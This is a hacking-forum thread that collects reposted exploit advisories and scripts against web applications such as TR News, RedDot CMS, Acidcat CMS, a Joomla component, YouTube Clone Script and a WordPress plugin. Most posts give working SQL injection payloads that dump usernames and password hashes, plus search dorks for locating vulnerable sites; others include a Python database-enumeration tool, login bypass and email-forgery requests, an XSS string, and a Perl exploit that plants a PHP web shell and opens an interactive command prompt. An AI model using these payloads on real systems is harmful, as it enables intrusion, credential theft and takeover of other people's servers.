Welcome guest, is this your first visit? Click the "Create Account" button now to join.
Page 1 of 2 12 LastLast
Results 1 to 7 of 12

Thread: Collection of New Exploits ! Will Be Updated C

  
Bookmark and Share
  1. #1

    Default Collection of New Exploits ! Will Be Updated C

    TR News 2.1 (nb) Remote SQL Injection Vulnerability


    ################################################## ######
    # #
    # Discovered by : His0k4 {Algerian HaCker} #
    # #
    # Email : His0k4.hlm[at]gmail[dot]com #
    # #
    # Greetz to: All Dz & muslims HaCkeRs :) #
    # #
    # Special Greetz:c02,Spym4n,THe-MooRiSH #
    # #
    ################################################## ######
    #
    # Script : Tr Script News v2.1
    #
    # Download script : Dear member\guest you have to reply to see the link

    #
    # Dork : inurl:news.php?mode=voir
    #
    # Vulnerable file : news.php
    #
    # P.O.C
    # Dear member\guest you have to reply to see the link[news_path]/news.php?mode=voir&nb=[SQL]
    #
    # Exemple:
    # Dear member\guest you have to reply to see the link[news_path]/news.php?mode=voir&nb=-1/**/UNION/**/SELECT/**/1,2,3,4,concat_ws(0x3a,pseudo,pass,email),6,7/**/from/**/tr_user_news/*
    #
    # Admin login: /admin
    #
    # Note: you can upload a shell from the administrator board by going in this link "/admin/main.php?mode=ajout_cat" and it will be uploaded in "[news_path]/images/icone_cat/shell.php"
    #
    ################################################## ###########################
    :ugeek: :ugeek: :ugeek: :ugeek: :ugeek: :ugeek: :ugeek: :ugeek: :ugeek: :ugeek: :ugeek:

  2. # ADS
    Circuit advertisement
    Join Date
    Always
    Posts
    Many
     

  3. #2

    Default Re: Collection of New Exploits ! Will Be Updated C

    #!/usr/bin/env python

    # un-comment your selection.

    import urllib2
    import urllib
    import string
    import getopt
    import sys

    def banner():
    print
    print "RED DOT CMS 7.5 database enumeration"
    print "by Mark Crowther and Rodrigo Marcos"

    def usage():
    print
    print "usage():"
    print "python RD_POC.py [options] URL"
    print
    print " [options]"
    print " --dbenum: Database enumeration"
    print " --tableenum: Table enumeration, use -d to specify database"
    print " --colenum: Column enumeration, use -d to specify database and -t to specify table"
    print " --dataenum: Data enumeration, use -d to specify database, -t to specify table and -c to specify a column"
    print " -d: Specify a database"
    print " -t: Specify a table"
    print " -c: Specify a column"
    print " -h: Help page"
    print
    print "Examples: "
    print " python RD_POC.py --dbenum Dear member\guest you have to reply to see the link"

    print " python RD_POC.py --tableenum -d IoAdministration Dear member\guest you have to reply to see the link"

    print " python RD_POC.py --colenum -d IoAdministration -t IO_USR Dear member\guest you have to reply to see the link"

    print " python RD_POC.py --dataenum -d IoAdministration -t IO_USR -c USR2 Dear member\guest you have to reply to see the link"

    print
    sys.exit()

    def retrievedata(url1, url2 = "' ORDER BY 1;-- &DisableAutoLogin=1"):
    stop = 0

    current = ''

    while (stop==0):

    request = url1 + current + url2

    request = string.replace(request, ' ', '%20')
    req = urllib2.Request(request)
    try:
    r = urllib2.urlopen(req)
    except urllib2.URLError, msg:
    print "[+] Error: Error requesting URL (%s)" % msg
    result = r.read()

    #print result
    if string.find(result, ' Description Conversion failed when converting the ') == -1:
    stop = 1
    else:
    start = string.find(result, "'") + 1
    end = string.find(result[start:], "'") + start
    current = result[start:end]
    print current


    def dbenum():

    retrievedata(url + "/ioRD.asp?Action=ShowMessage&LngId=ENG.DGC0 FROM IO_DGC_ENG UNION SELECT min(name) FROM SYS.SYSDATABASES where name> '")

    def tableenum(database=''):

    if database=='':
    retrievedata(url + "/ioRD.asp?Action=ShowMessage&LngId=ENG.DGC0 FROM IO_DGC_ENG UNION SELECT min(name) FROM SYSOBJECTS where xtype=char(85) and name> '")

    else:
    retrievedata(url + "/ioRD.asp?Action=ShowMessage&LngId=ENG.DGC0 FROM IO_DGC_ENG UNION SELECT min(name) FROM " + database + "..SYSOBJECTS where xtype=char(85) and name> '")

    def colenum(table, database=''):

    if table=='':
    usage()

    if database=='':
    retrievedata(url + "/ioRD.asp?Action=ShowMessage&LngId=ENG.DGC0 FROM IO_DGC_ENG UNION SELECT min(name) FROM SYSCOLUMNS where name > '", "' AND id = (SELECT id from SYSOBJECTS WHERE name= '" + table + "') ORDER BY 1;-- &DisableAutoLogin=1")
    else:
    retrievedata(url + "/ioRD.asp?Action=ShowMessage&LngId=ENG.DGC0 FROM IO_DGC_ENG UNION SELECT min(name) FROM " + database + "..SYSCOLUMNS where name > '","' AND id = (SELECT id from " + database + "..SYSOBJECTS WHERE name= '" + table + "') ORDER BY 1;-- &DisableAutoLogin=1")


    def dataenum(column, table, database=''):

    if column=='' or table=='':
    usage()

    if database=='':
    retrievedata(url + "/ioRD.asp?Action=ShowMessage&LngId=ENG.DGC0 FROM IO_DGC_ENG UNION SELECT MIN(" + column + ") FROM " + table + " WHERE " + column + "> '")

    else:
    retrievedata(url + "/ioRD.asp?Action=ShowMessage&LngId=ENG.DGC0 FROM IO_DGC_ENG UNION SELECT MIN(" + column + ") FROM " + database + ".." + table + " WHERE " + column + "> '")


    banner()
    pdbenum = 0
    ptableenum = 0
    pcolenum = 0
    pdataenum = 0
    database = ''
    table = ''
    column = ''

    url = sys.argv[len(sys.argv)-1]

    try:
    opts, args = getopt.getopt(sys.argv[1:], "d:t:c:h:", ["help", "dbenum", "tableenum", "colenum", "dataenum"])
    except getopt.GetoptError:
    usage()

    try:
    for o, a in opts:
    if o in ("-h", "--help"):
    usage()
    if o == "--dbenum":
    pdbenum = 1
    if o == "--tableenum":
    ptableenum = 1
    if o == "--colenum":
    pcolenum = 1
    if o == "--dataenum":
    pdataenum = 1
    if o == "-d":
    database = a
    if o == "-t":
    table = a
    if o == "-c":
    column = a
    except:
    usage()


    if pdbenum == 1:
    print 'Enumerating databases:'
    dbenum()
    elif ptableenum == 1:
    print 'Enumerating tables:'
    tableenum(database)
    elif pcolenum == 1:
    print 'Enumerating columns:'
    colenum(table, database)
    elif pdataenum == 1:
    print 'Enumerating data:'
    dataenum(column, table, database)
    else:
    usage()
    -----------------------------------------------------------------
    DaRkLiFe is Watching 8-)

  4. #3

    Default Re: Collection of New Exploits ! Will Be Updated C

    ################################################## ################################
    # AmnPardaz Security Research Team
    #
    # Title: Acidcat CMS Multiple Vulnerabilities.
    # Vendor: Dear member\guest you have to reply to see the link
    # Vulnerable Version: 3.4.1
    # Exploit: Available
    # Impact: High
    # Fix: N/A
    ################################################## #################################


    ####################
    1. Description:
    ####################
    Acidcat CMS is a web site and simple Content Management System that can be administered via a web browser.

    ####################
    2. Vulnerability:
    ####################
    2.1. There is a SQL Injection in "default.asp". By using it, attacker can gain usernames and encrypted passwords.
    2.1.1. POC:
    Check the exploit section.
    2.2. There is a logical vulnerability in which attacker can send email by the site without any permission.
    2.2.1. POC:
    Check the exploit section.
    2.3. There is a SQL Injection in "main_login2.asp". By using it, attacker can login to the site.
    2.3.1. POC:
    Check the exploit section.
    2.4. There is a XSS in "/admin/admin_colors_swatch.asp".
    2.4.1. POC:
    /admin/admin_colors_swatch.asp?field=value='';}alert('XSS ');function(){myForm.myText
    2.5. There is a FckEditor which has no permission, and attacker can upload his/her file.
    2.5.1. POC:
    /admin/fckeditor/editor/filemanager/connectors/test.html
    ####################
    3. Exploits:
    ####################

    Original Exploit URL: Dear member\guest you have to reply to see the link


    3.1. Attacker can gain usernames and passwords:
    -------------
    <form action="http://[The URL]/default.asp?formType=&itemID=" method="post">
    <input type="text" name="cID" id="cID" value="-1 union select 1,username,3,password,5,6,7,8,9,10,'1-1-2000','1-1-2010' from ac_user" />


    <input type="submit" value="Submit" />
    </form>

    -------------
    3.2. Attacker can send email without any permission:
    -------------
    default_mail_aspemail.asp? AcidcatSend=1&From=&FromName=FakeAdmin&To=&Subject =Forgery&Body=Change your password to 123456!

    default_mail_cdosys.asp? AcidcatSend=1&From=&FromName=FakeAdmin&To=&Subject =Forgery&Body=Change your password to 123456!

    default_mail_jmail.asp? AcidcatSend=1&From=&FromName=FakeAdmin&To=&Subject =Forgery&Body=Change your password to 123456!
    -------------
    3.3. Attacker can login to the site:
    -------------
    <form action="main_login2.asp" method="post">
    <input type="hidden" name="username" id="username" value="FooNot' union select 1,2,3,'%CE%10%C9%CE%AC%0F%F3%07A%91%8B%1B%9FF%2D%D F%EBcO%9Au%5F%28%80%A5%0D%D0%89%EA%EF%3E%BB%BDx%5F %0EM%7C%09%2C%B6s%9D%EAa%2FqX%7E%08%05%CAZ%26%1ET% 10%CE' from ac_user where Username='1'or'1'='1'or'1'='1" size="200"/>


    <input type="hidden" name="password" id="password" value="0" />


    <input type="submit" value="Click To Login!" />

  5. #4

    Default Re: Collection of New Exploits ! Will Be Updated C

    ################################################## #######
    # #
    # Joomla Component Profiler Blind SQL Injection #
    # #
    ################################################## #######


    ########################################

    [~] ScriptName: "Joomla"
    [~] ModuleName: "Profiler"
    [~] Version: ?

    ########################################

    [~] DORK: allinurl:com_comprofiler

    ########################################

    [~] Exploit: /index.php?option=com_comprofiler&task=userProfile& user=[SQL]
    [~] Example: /index.php?option=com_comprofiler&task=userProfile& user=1/**/and/**/mid((select/**/password/**/from/**/jos_users/**/limit/**/0,1),1,1)/**/</**/Char(97)/*

    ######################################## :arrow: :arrow: :arrow: :arrow: :arrow: :arrow:

  6. #5

    Default Re: Collection of New Exploits ! Will Be Updated C

    #!/usr/bin/perl
    #inphex
    #/siteadmin/spages.php
    # include("../include/config.php"Wink;
    # include("../include/function.php"Wink;
    #
    # if($_REQUEST['update'])
    # {
    # $file_path = $config['BASE_DIR']."/templates/".$_REQUEST['page'];
    # if(file_exists($file_path))
    # {
    # $handle = fopen($config['BASE_DIR']."/templates/".$_REQUEST['page'], "w"Wink;
    # fwrite($handle,stripslashes($_POST['body']));
    # fclose($handle);
    # $msg = "Page updated successfully";
    # }
    # else
    # $err = "Page does not exist";
    # }
    #
    # STemplate::assign('msg',$msg);
    # STemplate::assign('err',$err);
    # STemplate:Grinisplay("siteadmin/spages.tpl"Wink;
    #
    #Very easy one...
    #YouTube-Clone-Script is quite buggy,there are more bugs.

    use Digest::MD5 qw(md5 md5_hex md5_base64);
    use LWP::UserAgent;
    use HTTP::Cookies;
    use Switch;
    $host_ = shift;
    $path_ = shift;

    print "usage: $0 Dear member\guest you have to reply to see the link /path/\n";
    $info{'info'} = {
    "author" => ["inphex"],
    "name" => ["YouTube Clone Script Remote Code Execution"],
    "version" => [],
    "description" => ["This Script will exploit a Remote Code Execution vulnerability existing in the YouTube Clone Script\n"],
    "options" =>
    {
    "agent" => "",
    "proxy" => "",
    "default_headers" => [
    ["key","value"]],
    "timeout" => 2,
    "cookie" =>
    {
    "cookie" => ["key=value"],
    },
    },
    "sending_options" =>
    {
    "host" => $host_,
    "path" => $path_."siteadmin/spages.php",
    "port" => 80,
    "method_a" => "REMOTE_CHECK",
    "attack" =>
    {
    "update" => ["get","update","1"],
    "path" => ["get","page","../about.php"],
    "content" => ["post","body","<?php echo system(\$_GET[cmd]); ?>"],
    },
    },

    };
    &start($info{'info'},222);
    do {
    print "\$";$cmd = <STDIN>;chomp($cmd);
    $info{'info'} = { "options" =>{"agent" => "", "proxy" => "", "default_headers" => [ ["key","value"]], "timeout" => 2, "cookie" => {"cookie" => ["key=value"],},},"sending_options" =>{"host" => $host_, "path" => $path_."about.php", "port" => 80, "method_a" => "CODE_EXECUTION", "attack" =>{"cmd" => ["get","cmd",$cmd], },},};
    &start($info{'info'},221);
    $content = ${$info{'info'}}{221}{'content'};
    print $content;
    print "\n";
    } while (1);
    sub start
    {
    $a_ = shift;
    @EXPORT = qw( start $return $a_ );
    $id = shift;
    $get_dA = get_d_p_s("get"Wink;
    $post_dA = get_d_p_s("post"Wink;
    my ($x,$c,$m,$h,$ff,$kf,$hp,$c,$cccc) = (0,0,0,0,0,0,0,0,0);
    my $jj = 1;
    my $ii = 48;
    my $hh = 1;
    my $ppp = 0;
    my $s = shift;
    my $a = "";
    my $res_p = "";
    my $h = "";
    ($h_host_h_xdsjaop,$h_path_h_xdsjaop,$h_port_h_xds jaop,$method_m) = ($a_->{'sending_options'}{'host'},$a_->{'sending_options'}{'path'},$a_->{'sending_options'}{'port'},$a_->{'sending_options'}{'method_a'});
    $ua = LWP::UserAgent->new;
    $ua->timeout($a_->{'options'}{'timeout'});
    if ($a_->{'options'}{'proxy'}) {
    $ua->proxy(['http', 'ftp'] => $a_->{'options'}{'proxy'});
    }
    $agent = $a_->{'options'}{'agent'} || "Mozilla/5.0";
    $ua->agent($agent);
    {
    while (($k,$v) = each(%{$a_}))
    {
    if ($k ne "options" && $k ne "sending_options"Wink
    {
    foreach $r (@{$a_->{$k}})
    {
    if ($a_->{$k}[0])
    {
    print $k.":".$a_->{$k}[0]."\n";
    }
    }
    }
    }


    foreach $j (@{$a_->{'options'}{'default_headers'}})
    {
    $ua->default_headers->push_header($a_->{'options'}{'default_headers'}[$m][0] => $a_->{'options'}{'default_headers'}[$m][1]);
    $m++;
    }

    if ($a_->{'options'}{'cookie'}{'cookie'}[0])
    {
    $ua->default_headers->push_header('Cookie' => $a_->{'options'}{'cookie'}{'cookie'}[0]);
    }



    }
    switch ($method_m)
    {
    case "attack" { &attack();}
    case "SQL_INJECTION_BLIND" { &sql_injection_blind();}
    case "REMOTE_COMMAND_EXECUTION" { &attack();}
    case "REMOTE_CODE_EXECUTION" {&attack();}
    case "REMOTE_FILE_INCLUSION" { &attack();}
    case "LOCAL_FILE_INCLUSION" { &attack(); }
    else { &attack(); }

    }


    sub attack
    {

    if ($post_dA eq ""Wink {
    $method = "get";
    } elsif ($post_dA ne ""Wink
    {
    $method = "post";
    }
    if ($method eq "get"Wink {
    $res_p = get_data($h_host_h_xdsjaop,$h_path_h_xdsjaop."?".$ get_dA);
    ${$a_}{$id}{'content'} = $res_p;
    foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})
    {
    $res_p =~ /$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/;

    while ($jj <= $a_->{'sending_options'}{'attack'}{'regex'}[$h][1])
    {
    if (${$jj} ne ""Wink
    {
    ${$a_}{$id}{'regex'}[$h] = ${$jj};
    }
    $jj++;
    }
    $h++;
    }
    } elsif ($method eq "post"Wink
    {
    $res_p = post_data($h_host_h_xdsjaop,$h_path_h_xdsjaop."?". $get_dA,"application/x-www-form-urlencoded",$post_dA);

    ${$a_}{$id}{'content'} = $res_p;

    foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})
    {
    $res_p =~ /$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/;
    while ($jj <= $a_->{'sending_options'}{'attack'}{'regex'}[$h][1])
    {
    if (${$jj} ne ""Wink
    {
    ${$a_}{$id}{'regex'}[$h] = ${$jj};
    }
    $jj++;
    }
    $h++;
    }
    }

    }
    sub sql_injection_blind
    {
    while ()
    {
    while ($ii <= 90)
    {
    if(check($ii,$hh) == 1)
    {
    syswrite STDOUT,lc(chr($ii));
    $hh++;
    $chr = $chr.chr($ii);
    }
    $ii++;
    }
    push(@ffs,length($chr));
    if (($#ffs -1) == $ffs)
    {
    print "\nFinished/Error\n";
    exit;
    }
    $ii = 48;
    }
    }
    sub check($$)
    {
    $ii = shift;
    $hh = shift;
    if (get_d_p_s("post"Wink ne ""Wink
    {
    $method = "post";
    } else { $method = "get";}
    if ($method eq "get"Wink
    {
    $ppp++;
    $query = modify($get_dA,$ii,$hh);
    print $ii."-".$hh."\n";
    $res_p = get_data($h_host_h_xdsjaop,$a_->{'sending_options'}{'path'}."?".$query);
    foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})
    {
    if ($res_p =~m/$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/)
    {
    return 1;
    }
    else
    {
    return 0;
    }
    $h++;
    }
    } elsif ($method eq "post"Wink
    {
    $ppp++;
    $query_g = modify($get_dA,$ii,$hh);
    $query_p = modify($post_dA,$ii,$hh);

    $res_p = post_data($h_host_h_xdsjaop,$a_->{'sending_options'}{'path'}."?".$query_g,"applica tion/x-www-form-urlencoded",$query_p);
    foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})
    {
    if ($res_p =~m/$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/)
    {
    return 1;
    }
    else
    {
    return 0;
    }
    $h++;
    }
    }
    }
    sub modify($$$)
    {
    $string = shift;
    $replace_by = shift;
    $replace_by1 = shift;

    if ($string !~/\$i/ && $string !~/\$h/) {
    print $string;
    } elsif ($string !~/\$i/)
    {
    $ff = substr($string,0,index($string,"\$h"Wink);
    $ee = substr($string,rindex($string,"\$h"Wink+2);
    $string = $ff.$replace_by1.$ee;

    return $string;
    } elsif ($string !~/\$h/)
    {
    $f = substr($string,0,index($string,"\$i"Wink);
    $e = substr($string,rindex($string,"\$i"Wink+2);
    $string = $f.$replace_by.$e;
    return $string;
    } else
    {
    $f = substr($string,0,index($string,"\$i"Wink);
    $e = substr($string,rindex($string,"\$i"Wink+2);
    $string = $f.$replace_by.$e;

    $ff = substr($string,0,index($string,"\$h"Wink);
    $ee = substr($string,rindex($string,"\$h"Wink+2);
    $string = $ff.$replace_by1.$ee;

    return $string;
    }
    }
    sub get_d_p_s
    {
    $g_d_p_s = shift;
    $post_data = "";
    $get_data = "";
    $header_data = "";
    %header_dA = ();
    while (($k,$v) = each(%{$a_->{'sending_options'}{'attack'}}))
    {
    if ($a_->{'sending_options'}{'attack'}{$k}[0] =~ "get"Wink
    {

    $method = "get"; push(@get,$a_->{'sending_options'}{'attack'}{$k}[1]."=".$a_->{'sending_options'}{'attack'}{$k}[2]);
    }
    elsif ($a_->{'sending_options'}{'attack'}{$k}[0] =~ "post"Wink
    {
    $method = "post"; push(@post,$a_->{'sending_options'}{'attack'}{$k}[1]."=".$a_->{'sending_options'}{'attack'}{$k}[2]);
    }
    elsif ($a_->{'sending_options'}{'attack'}{$k}[0] =~ "header"Wink
    {
    $header_dA{$a_->{'sending_options'}{'attack'}{$k}[1]} = $a_->{'sending_options'}{'attack'}{$k}[2];
    }
    $hp++;
    }
    $yy = $#get;
    while ($bb <= $#get)
    {
    $get_data .= $get[$yy]."&";
    $bb++;
    $yy--;
    }
    $l = $#post;
    while ($k <= $#post)
    {

    $post_data .= $post[$l]."&";
    $k++;
    $l--;
    }
    if ($g_d_p_s eq "get"Wink
    {

    return $get_data;
    }
    elsif ($g_d_p_s eq "post"Wink
    {
    return $post_data;
    } elsif ($g_d_p_s eq "header"Wink
    {
    return %header_dA;
    }
    }
    sub get_data
    {
    $h_host_h_xdsjaop = shift;
    $h_path_h_xdsjaop = shift;
    %hash = get_d_p_s("header"Wink;
    while (($u,$c) = each(%hash))
    {
    $ua->default_headers->push_header($u => $c);
    }
    $req = $ua->get($h_host_h_xdsjaop.$h_path_h_xdsjaop);
    return $req->content;
    }
    sub post_data
    {
    $h_host_h_xdsjaop = shift;
    $h_path_h_xdsjaop = shift;
    $content_type = shift;
    $send = shift;
    %hash = get_d_p_s("header"Wink;
    while (($u,$c) = each(%hash))
    {
    $ua->default_headers->push_header($u => $c);
    }
    $req = HTTP::Request->new(POST => $h_host_h_xdsjaop.$h_path_h_xdsjaop);
    $req->content_type($content_type);
    $req->content($send);
    $res = $ua->request($req);
    return $res->content;
    }

    }

  7. #6

    Default Re: Collection of New Exploits ! Will Be Updated C

    ================================================== =======
    =============== JIKI TEAM [ Maroc And YameN ]===============
    ================================================== =======
    # Author : jiko
    # Script : E RESERV VERSION 2.1
    # Bug : Remote SQL Injection Vulnerability
    # Download : Dear member\guest you have to reply to see the link

    =========================JIkI Team===================
    # Exploit :
    Dear member\guest you have to reply to see the link[script]/index.php?ID_loc=[sql]
    # Ex :
    Dear member\guest you have to reply to see the link[script]/index.php?ID_loc=-1 union select version()--
    At Office Site
    Dear member\guest you have to reply to see the link)--
    ================================================== =======
    greetz:
    all my friend and H-T Team and all No-back members and tryag.Com
    visit: Dear member\guest you have to reply to see the link & Dear member\guest you have to reply to see the link
    ================================================== =======

  8. #7

    Default Re: Collection of New Exploits ! Will Be Updated C

    ===========================================
    There's standart sql-injection in Spreadsheet <= 0.6 Plugin
    # Author : 1ten0.0net1
    # Script : Wordpress Plugin Spreadsheet <= 0.6 v.
    # Download : Dear member\guest you have to reply to see the link

    # BUG : Remote SQL-Injection Vulnerability
    # Dork : inurl:/wp-content/plugins/wpSS/
    Example:
    Dear member\guest you have to reply to see the link)+union+select+1,concat(user_login,0x3a,user_pass, 0x3a,user_email),3,4+from+wp_users--&display=plain
    ===========================================
    Vulnerable code:
    ss_load.php
    $id = $_GET['ss_id'];
    ....
    ss_functions.php:
    function ss_load ($id, $plain=FALSE) {
    ....
    if ($wpdb->query("SELECT * FROM $table_name WHERE id='$id'") == 0) {
    ....

 

 
Page 1 of 2 12 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •